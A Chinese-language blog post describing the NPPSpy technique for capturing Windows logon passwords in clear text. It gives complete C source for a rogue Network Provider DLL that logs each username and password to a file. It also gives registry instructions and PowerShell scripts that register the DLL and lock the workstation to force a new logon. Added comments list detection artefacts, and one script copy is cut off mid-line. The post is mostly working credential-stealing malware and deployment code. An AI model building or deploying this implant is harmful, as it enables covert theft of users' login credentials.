利用系統函式獲取Windows明文密碼
阿新 • • 發佈:2020-07-22
0x01 前言
前段時間,根據大佬 Grzegorz Tworek 釋出的內容:使用 LanMan 版本的 NPLogonNotify() 函式來嗅探用於登入 Windows 的每個密碼。明文。無需重新啟動。今天過來研究一波,同時借鑑鴻鵠 ly 大佬寫的整合 PowerShell 呼叫,來進一步方便利用。
0x02 原理
通過修改登錄檔註冊一個網路提供者(Network Provider)DLL,藉助系統在登入時呼叫的 NPLogonNotify() 函式,抓取 Windows 明文密碼
0x03 復現
首先將下列程式碼(NPPSPy.c)編譯為 NPPSpy.dll:
NPPSPy.c原始碼
/*
 * NPPSPy.c — a minimal Windows Network Provider DLL exporting NPGetCaps and
 * NPLogonNotify.  Once registered through the registry entries described on
 * this page (an extra name in ProviderOrder plus
 * HKLM\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider), it is handed
 * the interactive logon credentials in clear text and appends them to
 * C:\NPPSpy.txt.
 *
 * Defender notes — every artefact below is static, which makes it easy to hunt for:
 *  - an unexpected name appended to the PROVIDERORDER value,
 *  - a new Services\NPPSpy\NetworkProvider key whose ProviderPath is a DLL that
 *    is not an OS component,
 *  - a growing plain-text file at a fixed path (C:\NPPSpy.txt).
 * Removing the ProviderOrder entry, the key and the DLL undoes the registration;
 * credentials already written to the file must be treated as exposed.
 */
#include <Windows.h>

// Capability indexes/values normally supplied by npapi.h, reproduced here so the
// file builds with only Windows.h.
#define WNNC_SPEC_VERSION 0x00000001
#define WNNC_SPEC_VERSION51 0x00050001
#define WNNC_NET_TYPE 0x00000002
#define WNNC_START 0x0000000C
#define WNNC_WAIT_FOR_START 0x00000001

// From ntdef.h.  Length and MaximumLength are byte counts — SavePassword passes
// Length straight to WriteFile as the number of bytes.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

// From NTSecAPI.h.  Only needed for the struct layout below; this DLL never
// inspects MessageType.
typedef enum _MSV1_0_LOGON_SUBMIT_TYPE {
    MsV1_0InteractiveLogon = 2,
    MsV1_0Lm20Logon,
    MsV1_0NetworkLogon,
    MsV1_0SubAuthLogon,
    MsV1_0WorkstationUnlockLogon = 7,
    MsV1_0S4ULogon = 12,
    MsV1_0VirtualLogon = 82,
    MsV1_0NoElevationLogon = 83,
    MsV1_0LuidLogon = 84,
} MSV1_0_LOGON_SUBMIT_TYPE, * PMSV1_0_LOGON_SUBMIT_TYPE;

// From NTSecAPI.h.  Layout of the lpAuthInfo buffer that NPLogonNotify receives
// for an "MSV1_0:Interactive" logon; NPLogonNotify below assumes this layout
// without checking lpAuthInfoType.
typedef struct _MSV1_0_INTERACTIVE_LOGON {
    MSV1_0_LOGON_SUBMIT_TYPE MessageType;
    UNICODE_STRING LogonDomainName;
    UNICODE_STRING UserName;
    UNICODE_STRING Password;
} MSV1_0_INTERACTIVE_LOGON, * PMSV1_0_INTERACTIVE_LOGON;

/*
 * Appends "<username> -> <password>\r\n" to C:\NPPSpy.txt as raw wide characters
 * (UTF-16LE on Windows, no BOM).
 * username, password: UNICODE_STRINGs taken straight from the logon buffer;
 *                     their Length fields are byte counts, as are the literal
 *                     8 (L" -> ") and 4 (L"\r\n") below.
 * The file is opened exclusively (share mode 0) with OPEN_ALWAYS and the file
 * pointer is moved to the end, so each logon adds one line.  WriteFile results
 * are ignored, and if CreateFile fails the credentials are silently dropped.
 * Returns nothing.
 */
void SavePassword(PUNICODE_STRING username, PUNICODE_STRING password)
{
    HANDLE hFile;
    DWORD dwWritten;
    hFile = CreateFile(TEXT("C:\\NPPSpy.txt"), GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        SetFilePointer(hFile, 0, NULL, FILE_END);
        WriteFile(hFile, username->Buffer, username->Length, &dwWritten, 0);
        WriteFile(hFile, L" -> ", 8, &dwWritten, 0);
        WriteFile(hFile, password->Buffer, password->Length, &dwWritten, 0);
        WriteFile(hFile, L"\r\n", 4, &dwWritten, 0);
        CloseHandle(hFile);
    }
}

/*
 * Capability query from the Multiple Provider Router.
 * nIndex: the WNNC_* capability being asked for.
 * Returns spec version 5.1, WNNC_CRED_MANAGER as the network type (the DLL
 * presents itself as a credential-manager provider, the class that receives
 * NPLogonNotify per the Network Provider API documentation), WNNC_WAIT_FOR_START
 * for WNNC_START, and 0 for anything else.
 * NOTE(review): WNNC_CRED_MANAGER is not defined in this listing; it is expected
 * to resolve through the SDK headers included by Windows.h (winnetwk.h) — confirm
 * on your toolchain.
 */
__declspec(dllexport) DWORD APIENTRY NPGetCaps(DWORD nIndex)
{
    switch (nIndex)
    {
    case WNNC_SPEC_VERSION: return WNNC_SPEC_VERSION51;
    case WNNC_NET_TYPE: return WNNC_CRED_MANAGER;
    case WNNC_START: return WNNC_WAIT_FOR_START;
    default: return 0;
    }
}

/*
 * Logon notification entry point: invoked with the authentication data of an
 * interactive logon.
 * lpAuthInfo is cast unconditionally to MSV1_0_INTERACTIVE_LOGON; lpLogonId,
 * lpAuthInfoType, the previous-auth parameters, lpStationName and StationHandle
 * are never examined.  The UserName and clear-text Password fields are passed to
 * SavePassword.
 * `lpLogonScript = NULL` only overwrites the local pointer parameter — the
 * caller's *lpLogonScript is left as the caller initialised it.
 * Returns WN_SUCCESS (from winnetwk.h via Windows.h), i.e. reports success to
 * the router.
 */
__declspec(dllexport) DWORD APIENTRY NPLogonNotify(
    PLUID lpLogonId,
    LPCWSTR lpAuthInfoType,
    LPVOID lpAuthInfo,
    LPCWSTR lpPrevAuthInfoType,
    LPVOID lpPrevAuthInfo,
    LPWSTR lpStationName,
    LPVOID StationHandle,
    LPWSTR* lpLogonScript
)
{
    SavePassword(
        &(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->UserName),
        &(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->Password)
    );
    lpLogonScript = NULL;
    return WN_SUCCESS;
}
通過修改登錄檔,來實現讀取密碼效果
- 將NPPSpy.dll複製到System32資料夾
- 在 HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order 的 "ProviderOrder" 值結尾新增 "NPPSpy"
- 建立 HKLM\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider,並設定以下值:
"Class" = [REG_DWORD]2
"ProviderPath" = [REG_EXPAND_SZ]"%SystemRoot%\System32\NPPSPY.dll"
"Name" = [REG_SZ]"NPPSpy"
通過Powershell指令碼進行呼叫,實現修改登錄檔的功能
# Registry half of the NPPSpy provider registration (the DLL itself must already be in System32).
# This copy was collapsed onto one line in the page capture and its last string literal is cut off
# at "NPPSPY.dl"; the complete script is repeated further down the page.
# Requires administrative rights (every write is under HKLM), i.e. this is post-compromise
# credential capture, not an initial-access technique.
# Defender note: the extra ",NPPSpy" in PROVIDERORDER and the new
# HKLM\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider key are static artefacts that can be
# audited or alerted on; removing both (and the DLL) reverts the change.
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
# $Path and $path are the same variable (PowerShell variable names are case-insensitive); the new
# provider name is appended after the existing providers.
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
# New-Item reports an error if the key already exists; nothing guards against a second run.
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
# No -PropertyType given: the registry provider derives DWord from the integer value (matching the
# [REG_DWORD]2 in the manual steps) — confirm with Get-ItemProperty.
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
# REG_EXPAND_SZ so %SystemRoot% is expanded by the loader.  NOTE: truncated in this copy of the script.
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dl
將編譯好的NPPSpy.dll複製到System32資料夾
執行ps1指令碼:
然後模擬使用者登出、重新登入,即可抓取到明文密碼
為了方便,直接加入鎖屏功能,一鍵修改登錄檔+鎖屏:
# Registry half of the NPPSpy provider registration (the DLL itself must already be in System32).
# Requires administrative rights (every write is under HKLM), i.e. this is post-compromise
# credential capture, not an initial-access technique.
# Defender note: the extra ",NPPSpy" in PROVIDERORDER and the new
# HKLM\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider key — whose ProviderPath points at a
# DLL that is not an OS component — are static artefacts that can be audited or alerted on; removing
# both (and the DLL) reverts the change.  The new provider is only picked up at the next logon.
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
# $Path and $path are the same variable (PowerShell variable names are case-insensitive); the new
# provider name is appended after the existing providers.
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
# New-Item reports an error if the key already exists; nothing guards against a second run.
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
# No -PropertyType given: the registry provider derives DWord from the integer value (matching the
# [REG_DWORD]2 in the manual steps) — confirm with Get-ItemProperty.
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
# REG_EXPAND_SZ so %SystemRoot% is expanded by the loader, as in the manual steps above.
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll"
Function Lock-WorkStation {
  # Locks the interactive session by P/Invoking user32!LockWorkStation.
  # The C# member definition is compiled once per session via Add-Type (a second call with the
  # same -Name/-Namespace in the same session would fail); the BOOL result is discarded.
  $memberDefinition = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
  $win32 = Add-Type -MemberDefinition $memberDefinition -Name "Win32LockWorkStation" -Namespace Win32Functions -PassThru
  [void]$win32::LockWorkStation()
}
# Lock the session right away so the next interactive logon is the one the freshly
# registered provider sees (the page relies on a logout/login cycle for capture).
Lock-WorkStation